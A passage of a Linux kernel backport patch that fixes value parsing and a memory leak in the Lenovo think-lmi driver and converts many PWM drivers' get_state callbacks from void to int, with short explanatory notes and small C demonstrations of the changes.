+-	ret = sysfs_emit(buf, "%s\n", value + 1);
++		ret = -EINVAL;
++	else {
++		/* On Workstations remove the Options part after the value */
++		p = strchrnul(value, ';');
++		*p = '\0';
++		ret = sysfs_emit(buf, "%s\n", value + 1);
++	}
+ 	kfree(item);
++
+ 	return ret;
+ }
+ 
+@@ -1457,10 +1462,10 @@ static int tlmi_analyze(void)
+ 			 * name string.
+ 			 * Try and pull that out if it's available.
+ 			 */
+-			char *item, *optstart, *optend;
++			char *optitem, *optstart, *optend;
+ 
+-			if (!tlmi_setting(setting->index, &item, LENOVO_BIOS_SETTING_GUID)) {
+-				optstart = strstr(item, "[Optional:");
++			if (!tlmi_setting(setting->index, &optitem, LENOVO_BIOS_SETTING_GUID)) {
++				optstart = strstr(optitem, "[Optional:");
+ 				if (optstart) {
+ 					optstart += strlen("[Optional:");
+ 					optend = strstr(optstart, "]");
+@@ -1469,6 +1474,7 @@ static int tlmi_analyze(void)
+ 							kstrndup(optstart, optend - optstart,
+ 									GFP_KERNEL);
+ 				}
++				kfree(optitem);
+ 			}
+ 		}
+ 		/*
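
The current_value_show() fix relies on strchrnul() returning a pointer to the first ';' or, failing that, to the terminating NUL, so writing '\0' through it truncates the Workstation-style ";Options" suffix with no extra NULL check. A standalone demonstration (strchrnul() is a GNU extension, hence _GNU_SOURCE; the sample string is invented):

#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>

int main(void)
{
	char item[] = "WakeOnLAN,Enable;[Optional:Enable,Disable]";
	char *value = strpbrk(item, ",");	/* -> ",Enable;..." */
	char *p;

	if (!value || value == item || !strlen(value + 1))
		return 1;

	p = strchrnul(value, ';');	/* ';' or trailing NUL */
	*p = '\0';
	printf("%s\n", value + 1);	/* prints "Enable" */
	return 0;
}
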
+diff --git a/drivers/pwm/pwm-atmel.c b/drivers/pwm/pwm-atmel.c
+index 8e00a4286145b..cdbc23649032c 100644
+--- a/drivers/pwm/pwm-atmel.c
++++ b/drivers/pwm/pwm-atmel.c
+@@ -356,8 +356,8 @@ static int atmel_pwm_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	return 0;
+ }
+ 
+-static void atmel_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+-				struct pwm_state *state)
++static int atmel_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
++			       struct pwm_state *state)
+ {
+ 	struct atmel_pwm_chip *atmel_pwm = to_atmel_pwm_chip(chip);
+ 	u32 sr, cmr;
+@@ -396,6 +396,8 @@ static void atmel_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+ 		state->polarity = PWM_POLARITY_INVERSED;
+ 	else
+ 		state->polarity = PWM_POLARITY_NORMAL;
++
++	return 0;
+ }
+ 
+ static const struct pwm_ops atmel_pwm_ops = {
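
The pwm-atmel hunk above and the PWM hunks that follow all apply one mechanical conversion: the .get_state callback in struct pwm_ops changes from void to int so a driver could propagate errors to the core. Note that in this backport most drivers still return 0 even when an internal read fails, preserving old behavior. A pared-down sketch of the new callback shape (stand-in struct, not the kernel header):

#include <stdbool.h>
#include <stdio.h>

/* Stand-in types only -- this is not the kernel's pwm header. */
struct pwm_state {
	unsigned long period;		/* ns */
	unsigned long duty_cycle;	/* ns */
	bool enabled;
};

/* Old shape: void get_state(...).  New shape: int get_state(...),
 * so a failed register/bus read could be reported as an errno. */
static int demo_get_state(struct pwm_state *state)
{
	int err = 0;	/* imagine a regmap_read() result here */

	if (err)
		return err;

	state->period = 1000000;
	state->duty_cycle = 250000;
	state->enabled = true;
	return 0;
}

int main(void)
{
	struct pwm_state s;

	if (demo_get_state(&s) == 0)
		printf("period=%lu duty=%lu enabled=%d\n",
		       s.period, s.duty_cycle, s.enabled);
	return 0;
}
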
+diff --git a/drivers/pwm/pwm-bcm-iproc.c b/drivers/pwm/pwm-bcm-iproc.c
+index 7251037d4dd56..97ec131eb7c1b 100644
+--- a/drivers/pwm/pwm-bcm-iproc.c
++++ b/drivers/pwm/pwm-bcm-iproc.c
+@@ -68,8 +68,8 @@ static void iproc_pwmc_disable(struct iproc_pwmc *ip, unsigned int channel)
+ 	ndelay(400);
+ }
+ 
+-static void iproc_pwmc_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+-				 struct pwm_state *state)
++static int iproc_pwmc_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
++				struct pwm_state *state)
+ {
+ 	struct iproc_pwmc *ip = to_iproc_pwmc(chip);
+ 	u64 tmp, multi, rate;
+@@ -91,7 +91,7 @@ static void iproc_pwmc_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	if (rate == 0) {
+ 		state->period = 0;
+ 		state->duty_cycle = 0;
+-		return;
++		return 0;
+ 	}
+ 
+ 	value = readl(ip->base + IPROC_PWM_PRESCALE_OFFSET);
+@@ -107,6 +107,8 @@ static void iproc_pwmc_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	value = readl(ip->base + IPROC_PWM_DUTY_CYCLE_OFFSET(pwm->hwpwm));
+ 	tmp = (value & IPROC_PWM_PERIOD_MAX) * multi;
+ 	state->duty_cycle = div64_u64(tmp, rate);
++
++	return 0;
+ }
+ 
+ static int iproc_pwmc_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+diff --git a/drivers/pwm/pwm-crc.c b/drivers/pwm/pwm-crc.c
+index 7b357d1cf6421..4099850117ba4 100644
+--- a/drivers/pwm/pwm-crc.c
++++ b/drivers/pwm/pwm-crc.c
+@@ -121,8 +121,8 @@ static int crc_pwm_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	return 0;
+ }
+ 
+-static void crc_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+-			      struct pwm_state *state)
++static int crc_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
++			     struct pwm_state *state)
+ {
+ 	struct crystalcove_pwm *crc_pwm = to_crc_pwm(chip);
+ 	struct device *dev = crc_pwm->chip.dev;
+@@ -132,13 +132,13 @@ static void crc_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	error = regmap_read(crc_pwm->regmap, PWM0_CLK_DIV, &clk_div_reg);
+ 	if (error) {
+ 		dev_err(dev, "Error reading PWM0_CLK_DIV %d\n", error);
+-		return;
++		return 0;
+ 	}
+ 
+ 	error = regmap_read(crc_pwm->regmap, PWM0_DUTY_CYCLE, &duty_cycle_reg);
+ 	if (error) {
+ 		dev_err(dev, "Error reading PWM0_DUTY_CYCLE %d\n", error);
+-		return;
++		return 0;
+ 	}
+ 
+ 	clk_div = (clk_div_reg & ~PWM_OUTPUT_ENABLE) + 1;
+@@ -149,6 +149,8 @@ static void crc_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+ 		DIV_ROUND_UP_ULL(duty_cycle_reg * state->period, PWM_MAX_LEVEL);
+ 	state->polarity = PWM_POLARITY_NORMAL;
+ 	state->enabled = !!(clk_div_reg & PWM_OUTPUT_ENABLE);
++
++	return 0;
+ }
+ 
+ static const struct pwm_ops crc_pwm_ops = {
+diff --git a/drivers/pwm/pwm-cros-ec.c b/drivers/pwm/pwm-cros-ec.c
+index 7f10f56c3eb66..e55bc36ed4972 100644
+--- a/drivers/pwm/pwm-cros-ec.c
++++ b/drivers/pwm/pwm-cros-ec.c
+@@ -183,8 +183,8 @@ static int cros_ec_pwm_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	return 0;
+ }
+ 
+-static void cros_ec_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+-				  struct pwm_state *state)
++static int cros_ec_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
++				 struct pwm_state *state)
+ {
+ 	struct cros_ec_pwm_device *ec_pwm = pwm_to_cros_ec_pwm(chip);
+ 	struct cros_ec_pwm *channel = pwm_get_chip_data(pwm);
+@@ -193,11 +193,12 @@ static void cros_ec_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	ret = cros_ec_pwm_get_duty(ec_pwm, pwm->hwpwm);
+ 	if (ret < 0) {
+ 		dev_err(chip->dev, "error getting initial duty: %d\n", ret);
+-		return;
++		return 0;
+ 	}
+ 
+ 	state->enabled = (ret > 0);
+ 	state->period = EC_PWM_MAX_DUTY;
++	state->polarity = PWM_POLARITY_NORMAL;
+ 
+ 	/*
+ 	 * Note that "disabled" and "duty cycle == 0" are treated the same. If
+@@ -212,6 +213,8 @@ static void cros_ec_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+ 		state->duty_cycle = channel->duty_cycle;
+ 	else
+ 		state->duty_cycle = ret;
++
++	return 0;
+ }
+ 
+ static struct pwm_device *
+diff --git a/drivers/pwm/pwm-dwc.c b/drivers/pwm/pwm-dwc.c
+index 7568300bb11e5..bd2308812096d 100644
+--- a/drivers/pwm/pwm-dwc.c
++++ b/drivers/pwm/pwm-dwc.c
+@@ -163,8 +163,8 @@ static int dwc_pwm_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	return 0;
+ }
+ 
+-static void dwc_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+-			      struct pwm_state *state)
++static int dwc_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
++			     struct pwm_state *state)
+ {
+ 	struct dwc_pwm *dwc = to_dwc_pwm(chip);
+ 	u64 duty, period;
+@@ -188,6 +188,8 @@ static void dwc_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	state->polarity = PWM_POLARITY_INVERSED;
+ 
+ 	pm_runtime_put_sync(chip->dev);
++
++	return 0;
+ }
+ 
+ static const struct pwm_ops dwc_pwm_ops = {
+diff --git a/drivers/pwm/pwm-hibvt.c b/drivers/pwm/pwm-hibvt.c
+index 333f1b18ff4e6..1b9274c5ad872 100644
+--- a/drivers/pwm/pwm-hibvt.c
++++ b/drivers/pwm/pwm-hibvt.c
+@@ -128,8 +128,8 @@ static void hibvt_pwm_set_polarity(struct pwm_chip *chip,
+ 				PWM_POLARITY_MASK, (0x0 << PWM_POLARITY_SHIFT));
+ }
+ 
+-static void hibvt_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+-				struct pwm_state *state)
++static int hibvt_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
++			       struct pwm_state *state)
+ {
+ 	struct hibvt_pwm_chip *hi_pwm_chip = to_hibvt_pwm_chip(chip);
+ 	void __iomem *base;
+@@ -146,6 +146,9 @@ static void hibvt_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+ 
+ 	value = readl(base + PWM_CTRL_ADDR(pwm->hwpwm));
+ 	state->enabled = (PWM_ENABLE_MASK & value);
++	state->polarity = (PWM_POLARITY_MASK & value) ? PWM_POLARITY_INVERSED : PWM_POLARITY_NORMAL;
++
++	return 0;
+ }
+ 
+ static int hibvt_pwm_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+diff --git a/drivers/pwm/pwm-imx-tpm.c b/drivers/pwm/pwm-imx-tpm.c
+index e5e7b7c339a8f..ed1aad96fff04 100644
+--- a/drivers/pwm/pwm-imx-tpm.c
++++ b/drivers/pwm/pwm-imx-tpm.c
+@@ -132,9 +132,9 @@ static int pwm_imx_tpm_round_state(struct pwm_chip *chip,
+ 	return 0;
+ }
+ 
+-static void pwm_imx_tpm_get_state(struct pwm_chip *chip,
+-				  struct pwm_device *pwm,
+-				  struct pwm_state *state)
++static int pwm_imx_tpm_get_state(struct pwm_chip *chip,
++				 struct pwm_device *pwm,
++				 struct pwm_state *state)
+ {
+ 	struct imx_tpm_pwm_chip *tpm = to_imx_tpm_pwm_chip(chip);
+ 	u32 rate, val, prescale;
+@@ -164,6 +164,8 @@ static void pwm_imx_tpm_get_state(struct pwm_chip *chip,
+ 
+ 	/* get channel status */
+ 	state->enabled = FIELD_GET(PWM_IMX_TPM_CnSC_ELS, val) ? true : false;
++
++	return 0;
+ }
+ 
+ /* this function is supposed to be called with mutex hold */
+diff --git a/drivers/pwm/pwm-imx27.c b/drivers/pwm/pwm-imx27.c
+index ea91a2f81a9fc..3a22c2fddc452 100644
+--- a/drivers/pwm/pwm-imx27.c
++++ b/drivers/pwm/pwm-imx27.c
+@@ -118,8 +118,8 @@ static void pwm_imx27_clk_disable_unprepare(struct pwm_imx27_chip *imx)
+ 	clk_disable_unprepare(imx->clk_ipg);
+ }
+ 
+-static void pwm_imx27_get_state(struct pwm_chip *chip,
+-				struct pwm_device *pwm, struct pwm_state *state)
++static int pwm_imx27_get_state(struct pwm_chip *chip,
++			       struct pwm_device *pwm, struct pwm_state *state)
+ {
+ 	struct pwm_imx27_chip *imx = to_pwm_imx27_chip(chip);
+ 	u32 period, prescaler, pwm_clk, val;
+@@ -128,7 +128,7 @@ static void pwm_imx27_get_state(struct pwm_chip *chip,
+ 
+ 	ret = pwm_imx27_clk_prepare_enable(imx);
+ 	if (ret < 0)
+-		return;
++		return 0;
+ 
+ 	val = readl(imx->mmio_base + MX3_PWMCR);
+ 
+@@ -170,6 +170,8 @@ static void pwm_imx27_get_state(struct pwm_chip *chip,
+ 	state->duty_cycle = DIV_ROUND_UP_ULL(tmp, pwm_clk);
+ 
+ 	pwm_imx27_clk_disable_unprepare(imx);
++
++	return 0;
+ }
+ 
+ static void pwm_imx27_sw_reset(struct pwm_chip *chip)
+diff --git a/drivers/pwm/pwm-intel-lgm.c b/drivers/pwm/pwm-intel-lgm.c
+index b66c350740870..0cd7dd548e82f 100644
+--- a/drivers/pwm/pwm-intel-lgm.c
++++ b/drivers/pwm/pwm-intel-lgm.c
+@@ -86,8 +86,8 @@ static int lgm_pwm_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	return lgm_pwm_enable(chip, 1);
+ }
+ 
+-static void lgm_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+-			      struct pwm_state *state)
++static int lgm_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
++			     struct pwm_state *state)
+ {
+ 	struct lgm_pwm_chip *pc = to_lgm_pwm_chip(chip);
+ 	u32 duty, val;
+@@ -100,6 +100,8 @@ static void lgm_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	regmap_read(pc->regmap, LGM_PWM_FAN_CON0, &val);
+ 	duty = FIELD_GET(LGM_PWM_FAN_DC_MSK, val);
+ 	state->duty_cycle = DIV_ROUND_UP(duty * pc->period, LGM_PWM_MAX_DUTY_CYCLE);
++
++	return 0;
+ }
+ 
+ static const struct pwm_ops lgm_pwm_ops = {
+diff --git a/drivers/pwm/pwm-iqs620a.c b/drivers/pwm/pwm-iqs620a.c
+index 54bd95a5cab0c..aeb19a274accf 100644
+--- a/drivers/pwm/pwm-iqs620a.c
++++ b/drivers/pwm/pwm-iqs620a.c
+@@ -104,8 +104,8 @@ static int iqs620_pwm_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	return ret;
+ }
+ 
+-static void iqs620_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+-				 struct pwm_state *state)
++static int iqs620_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
++				struct pwm_state *state)
+ {
+ 	struct iqs620_pwm_private *iqs620_pwm;
+ 
+@@ -126,6 +126,9 @@ static void iqs620_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	mutex_unlock(&iqs620_pwm->lock);
+ 
+ 	state->period = IQS620_PWM_PERIOD_NS;
++	state->polarity = PWM_POLARITY_NORMAL;
++
++	return 0;
+ }
+ 
+ static int iqs620_pwm_notifier(struct notifier_block *notifier,
+diff --git a/drivers/pwm/pwm-keembay.c b/drivers/pwm/pwm-keembay.c
+index 733811b057219..ac02d8bb4a0b5 100644
+--- a/drivers/pwm/pwm-keembay.c
++++ b/drivers/pwm/pwm-keembay.c
+@@ -89,8 +89,8 @@ static void keembay_pwm_disable(struct keembay_pwm *priv, int ch)
+ 				KMB_PWM_LEADIN_OFFSET(ch));
+ }
+ 
+-static void keembay_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+-				  struct pwm_state *state)
++static int keembay_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
++				 struct pwm_state *state)
+ {
+ 	struct keembay_pwm *priv = to_keembay_pwm_dev(chip);
+ 	unsigned long long high, low;
+@@ -113,6 +113,8 @@ static void keembay_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	state->duty_cycle = DIV_ROUND_UP_ULL(high, clk_rate);
+ 	state->period = DIV_ROUND_UP_ULL(high + low, clk_rate);
+ 	state->polarity = PWM_POLARITY_NORMAL;
++
++	return 0;
+ }
+ 
+ static int keembay_pwm_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+diff --git a/drivers/pwm/pwm-lpss.c b/drivers/pwm/pwm-lpss.c
+index accdef5dd58e7..81ac297b8ba50 100644
+--- a/drivers/pwm/pwm-lpss.c
++++ b/drivers/pwm/pwm-lpss.c
+@@ -205,8 +205,8 @@ static int pwm_lpss_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	return ret;
+ }
+ 
+-static void pwm_lpss_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+-			       struct pwm_state *state)
++static int pwm_lpss_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
++			      struct pwm_state *state)
+ {
+ 	struct pwm_lpss_chip *lpwm = to_lpwm(chip);
+ 	unsigned long base_unit_range;
+@@ -236,6 +236,8 @@ static void pwm_lpss_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	state->enabled = !!(ctrl & PWM_ENABLE);
+ 
+ 	pm_runtime_put(chip->dev);
++
++	return 0;
+ }
+ 
+ static const struct pwm_ops pwm_lpss_ops = {
+diff --git a/drivers/pwm/pwm-meson.c b/drivers/pwm/pwm-meson.c
+index 57112f438c6dd..5cd7b90872c62 100644
+--- a/drivers/pwm/pwm-meson.c
++++ b/drivers/pwm/pwm-meson.c
+@@ -162,6 +162,12 @@ static int meson_pwm_calc(struct meson_pwm *meson, struct pwm_device *pwm,
+ 	duty = state->duty_cycle;
+ 	period = state->period;
+ 
++	/*
++	 * Note this is wrong. The result is an output wave that isn't really
++	 * inverted and so is wrongly identified by .get_state as normal.
++	 * Fixing this needs some care however as some machines might rely on
++	 * this.
++	 */
+ 	if (state->polarity == PWM_POLARITY_INVERSED)
+ 		duty = period - duty;
+ 
+@@ -318,8 +324,8 @@ static unsigned int meson_pwm_cnt_to_ns(struct pwm_chip *chip,
+ 	return cnt * fin_ns * (channel->pre_div + 1);
+ }
+ 
+-static void meson_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+-				struct pwm_state *state)
++static int meson_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
++			       struct pwm_state *state)
+ {
+ 	struct meson_pwm *meson = to_meson_pwm(chip);
+ 	struct meson_pwm_channel_data *channel_data;
+@@ -327,7 +333,7 @@ static void meson_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	u32 value, tmp;
+ 
+ 	if (!state)
+-		return;
++		return 0;
+ 
+ 	channel = &meson->channels[pwm->hwpwm];
+ 	channel_data = &meson_pwm_per_channel_data[pwm->hwpwm];
+@@ -357,6 +363,10 @@ static void meson_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+ 		state->period = 0;
+ 		state->duty_cycle = 0;
+ 	}
++
++	state->polarity = PWM_POLARITY_NORMAL;
++
++	return 0;
+ }
+ 
+ static const struct pwm_ops meson_pwm_ops = {
+diff --git a/drivers/pwm/pwm-mtk-disp.c b/drivers/pwm/pwm-mtk-disp.c
+index 3fbb4bae93a4e..ccf0ccdef29df 100644
+--- a/drivers/pwm/pwm-mtk-disp.c
++++ b/drivers/pwm/pwm-mtk-disp.c
+@@ -172,9 +172,9 @@ static int mtk_disp_pwm_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	return 0;
+ }
+ 
+-static void mtk_disp_pwm_get_state(struct pwm_chip *chip,
+-				   struct pwm_device *pwm,
+-				   struct pwm_state *state)
++static int mtk_disp_pwm_get_state(struct pwm_chip *chip,
++				  struct pwm_device *pwm,
++				  struct pwm_state *state)
+ {
+ 	struct mtk_disp_pwm *mdp = to_mtk_disp_pwm(chip);
+ 	u64 rate, period, high_width;
+@@ -184,14 +184,14 @@ static void mtk_disp_pwm_get_state(struct pwm_chip *chip,
+ 	err = clk_prepare_enable(mdp->clk_main);
+ 	if (err < 0) {
+ 		dev_err(chip->dev, "Can't enable mdp->clk_main: %pe\n", ERR_PTR(err));
+-		return;
++		return 0;
+ 	}
+ 
+ 	err = clk_prepare_enable(mdp->clk_mm);
+ 	if (err < 0) {
+ 		dev_err(chip->dev, "Can't enable mdp->clk_mm: %pe\n", ERR_PTR(err));
+ 		clk_disable_unprepare(mdp->clk_main);
+-		return;
++		return 0;
+ 	}
+ 
+ 	rate = clk_get_rate(mdp->clk_main);
+@@ -212,6 +212,8 @@ static void mtk_disp_pwm_get_state(struct pwm_chip *chip,
+ 	state->polarity = PWM_POLARITY_NORMAL;
+ 	clk_disable_unprepare(mdp->clk_mm);
+ 	clk_disable_unprepare(mdp->clk_main);
++
++	return 0;
+ }
+ 
+ static const struct pwm_ops mtk_disp_pwm_ops = {
+diff --git a/drivers/pwm/pwm-pca9685.c b/drivers/pwm/pwm-pca9685.c
+index f230c10d28bb2..41be244e7dd3d 100644
+--- a/drivers/pwm/pwm-pca9685.c
++++ b/drivers/pwm/pwm-pca9685.c
+@@ -431,8 +431,8 @@ static int pca9685_pwm_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	return ret;
+ }
+ 
+-static void pca9685_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+-				  struct pwm_state *state)
++static int pca9685_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
++				 struct pwm_state *state)
+ {
+ 	struct pca9685 *pca = to_pca(chip);
+ 	unsigned long long duty;
+@@ -458,12 +458,14 @@ static void pca9685_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+ 		 */
+ 		state->duty_cycle = 0;
+ 		state->enabled = false;
+-		return;
++		return 0;
+ 	}
+ 
+ 	state->enabled = true;
+ 	duty = pca9685_pwm_get_duty(pca, pwm->hwpwm);
+ 	state->duty_cycle = DIV_ROUND_DOWN_ULL(duty * state->period, PCA9685_COUNTER_RANGE);
++
++	return 0;
+ }
+ 
+ static int pca9685_pwm_request(struct pwm_chip *chip, struct pwm_device *pwm)
+diff --git a/drivers/pwm/pwm-raspberrypi-poe.c b/drivers/pwm/pwm-raspberrypi-poe.c
+index 6ff73029f367f..2939b71a7ba7b 100644
+--- a/drivers/pwm/pwm-raspberrypi-poe.c
++++ b/drivers/pwm/pwm-raspberrypi-poe.c
+@@ -82,9 +82,9 @@ static int raspberrypi_pwm_get_property(struct rpi_firmware *firmware,
+ 	return 0;
+ }
+ 
+-static void raspberrypi_pwm_get_state(struct pwm_chip *chip,
+-				      struct pwm_device *pwm,
+-				      struct pwm_state *state)
++static int raspberrypi_pwm_get_state(struct pwm_chip *chip,
++				     struct pwm_device *pwm,
++				     struct pwm_state *state)
+ {
+ 	struct raspberrypi_pwm *rpipwm = raspberrypi_pwm_from_chip(chip);
+ 
+@@ -93,6 +93,8 @@ static void raspberrypi_pwm_get_state(struct pwm_chip *chip,
+ 					 RPI_PWM_MAX_DUTY);
+ 	state->enabled = !!(rpipwm->duty_cycle);
+ 	state->polarity = PWM_POLARITY_NORMAL;
++
++	return 0;
+ }
+ 
+ static int raspberrypi_pwm_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+diff --git a/drivers/pwm/pwm-rockchip.c b/drivers/pwm/pwm-rockchip.c
+index a5af859217c19..3ec7d17569034 100644
+--- a/drivers/pwm/pwm-rockchip.c
++++ b/drivers/pwm/pwm-rockchip.c
+@@ -57,9 +57,9 @@ static inline struct rockchip_pwm_chip *to_rockchip_pwm_chip(struct pwm_chip *c)
+ 	return container_of(c, struct rockchip_pwm_chip, chip);
+ }
+ 
+-static void rockchip_pwm_get_state(struct pwm_chip *chip,
+-				   struct pwm_device *pwm,
+-				   struct pwm_state *state)
++static int rockchip_pwm_get_state(struct pwm_chip *chip,
++				  struct pwm_device *pwm,
++				  struct pwm_state *state)
+ {
+ 	struct rockchip_pwm_chip *pc = to_rockchip_pwm_chip(chip);
+ 	u32 enable_conf = pc->data->enable_conf;
+@@ -70,11 +70,11 @@ static void rockchip_pwm_get_state(struct pwm_chip *chip,
+ 
+ 	ret = clk_enable(pc->pclk);
+ 	if (ret)
+-		return;
++		return 0;
+ 
+ 	ret = clk_enable(pc->clk);
+ 	if (ret)
+-		return;
++		return 0;
+ 
+ 	clk_rate = clk_get_rate(pc->clk);
+ 
+@@ -96,6 +96,8 @@ static void rockchip_pwm_get_state(struct pwm_chip *chip,
+ 
+ 	clk_disable(pc->clk);
+ 	clk_disable(pc->pclk);
++
++	return 0;
+ }
+ 
+ static void rockchip_pwm_config(struct pwm_chip *chip, struct pwm_device *pwm,
+diff --git a/drivers/pwm/pwm-sifive.c b/drivers/pwm/pwm-sifive.c
+index 89d53a0f91e65..393a4b97fc19e 100644
+--- a/drivers/pwm/pwm-sifive.c
++++ b/drivers/pwm/pwm-sifive.c
+@@ -105,8 +105,8 @@ static void pwm_sifive_update_clock(struct pwm_sifive_ddata *ddata,
+ 		"New real_period = %u ns\n", ddata->real_period);
+ }
+ 
+-static void pwm_sifive_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+-				 struct pwm_state *state)
++static int pwm_sifive_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
++				struct pwm_state *state)
+ {
+ 	struct pwm_sifive_ddata *ddata = pwm_sifive_chip_to_ddata(chip);
+ 	u32 duty, val;
+@@ -123,6 +123,8 @@ static void pwm_sifive_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	state->duty_cycle =
+ 		(u64)duty * ddata->real_period >> PWM_SIFIVE_CMPWIDTH;
+ 	state->polarity = PWM_POLARITY_INVERSED;
++
++	return 0;
+ }
+ 
+ static int pwm_sifive_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+diff --git a/drivers/pwm/pwm-sl28cpld.c b/drivers/pwm/pwm-sl28cpld.c
+index 589aeaaa6ac86..e64900ad4ba1e 100644
+--- a/drivers/pwm/pwm-sl28cpld.c
++++ b/drivers/pwm/pwm-sl28cpld.c
+@@ -87,9 +87,9 @@ struct sl28cpld_pwm {
+ #define sl28cpld_pwm_from_chip(_chip) \
+ 	container_of(_chip, struct sl28cpld_pwm, pwm_chip)
+ 
+-static void sl28cpld_pwm_get_state(struct pwm_chip *chip,
+-				   struct pwm_device *pwm,
+-				   struct pwm_state *state)
++static int sl28cpld_pwm_get_state(struct pwm_chip *chip,
++				  struct pwm_device *pwm,
++				  struct pwm_state *state)
+ {
+ 	struct sl28cpld_pwm *priv = sl28cpld_pwm_from_chip(chip);
+ 	unsigned int reg;
+@@ -115,6 +115,8 @@ static void sl28cpld_pwm_get_state(struct pwm_chip *chip,
+ 	 * the PWM core.
+ 	 */
+ 	state->duty_cycle = min(state->duty_cycle, state->period);
++
++	return 0;
+ }
+ 
+ static int sl28cpld_pwm_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+diff --git a/drivers/pwm/pwm-sprd.c b/drivers/pwm/pwm-sprd.c
+index 7004f55bbf115..87d5cb7f67d67 100644
+--- a/drivers/pwm/pwm-sprd.c
++++ b/drivers/pwm/pwm-sprd.c
+@@ -65,8 +65,8 @@ static void sprd_pwm_write(struct sprd_pwm_chip *spc, u32 hwid,
+ 	writel_relaxed(val, spc->base + offset);
+ }
+ 
+-static void sprd_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+-			       struct pwm_state *state)
++static int sprd_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
++			      struct pwm_state *state)
+ {
+ 	struct sprd_pwm_chip *spc =
+ 		container_of(chip, struct sprd_pwm_chip, chip);
+@@ -83,7 +83,7 @@ static void sprd_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	if (ret) {
+ 		dev_err(spc->dev, "failed to enable pwm%u clocks\n",
+ 			pwm->hwpwm);
+-		return;
++		return 0;
+ 	}
+ 
+ 	val = sprd_pwm_read(spc, pwm->hwpwm, SPRD_PWM_ENABLE);
+@@ -109,10 +109,13 @@ static void sprd_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	duty = val & SPRD_PWM_DUTY_MSK;
+ 	tmp = (prescale + 1) * NSEC_PER_SEC * duty;
+ 	state->duty_cycle = DIV_ROUND_CLOSEST_ULL(tmp, chn->clk_rate);
++	state->polarity = PWM_POLARITY_NORMAL;
+ 
+ 	/* Disable PWM clocks if the PWM channel is not in enable state. */
+ 	if (!state->enabled)
+ 		clk_bulk_disable_unprepare(SPRD_PWM_CHN_CLKS_NUM, chn->clks);
++
++	return 0;
+ }
+ 
+ static int sprd_pwm_config(struct sprd_pwm_chip *spc, struct pwm_device *pwm,
+diff --git a/drivers/pwm/pwm-stm32-lp.c b/drivers/pwm/pwm-stm32-lp.c
+index 61a1c87cd5016..31a185c6b8da4 100644
+--- a/drivers/pwm/pwm-stm32-lp.c
++++ b/drivers/pwm/pwm-stm32-lp.c
+@@ -157,9 +157,9 @@ err:
+ 	return ret;
+ }
+ 
+-static void stm32_pwm_lp_get_state(struct pwm_chip *chip,
+-				   struct pwm_device *pwm,
+-				   struct pwm_state *state)
++static int stm32_pwm_lp_get_state(struct pwm_chip *chip,
++				  struct pwm_device *pwm,
++				  struct pwm_state *state)
+ {
+ 	struct stm32_pwm_lp *priv = to_stm32_pwm_lp(chip);
+ 	unsigned long rate = clk_get_rate(priv->clk);
